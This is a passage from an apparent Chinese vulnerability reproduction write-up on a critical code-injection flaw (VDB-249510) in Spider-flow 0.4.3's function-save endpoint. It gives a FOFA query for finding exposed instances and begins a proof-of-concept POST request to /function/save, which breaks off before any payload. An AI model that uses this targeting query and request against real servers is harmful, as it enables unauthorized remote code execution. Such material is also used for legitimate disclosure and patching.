0x01 产品简介
Spider-flow是一个基于Spring Boot和Layui开发的前后端不分离的爬虫平台。该平台以图形化方式定义爬虫流程,用户无需编写代码即可实现一个爬虫。
0x02 漏洞概述
在spider-flow 0.4.3版本的src/main/java/org/spiderflow/controller/FunctionController.java文件的FunctionService.saveFunction函数中发现了一个被归类为关键的漏洞。该漏洞可导致代码注入,并允许远程发起攻击。漏洞详细信息已公开披露,可能会被利用。此漏洞的标识符为VDB-249510。
0x03 测绘语句
FOFA语句:body="SpiderFlow平台"
0x04 漏洞复现
poc:
POST /function/save HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.78
Content-Length: 131
Accept: text/html,application/xhtml+xml,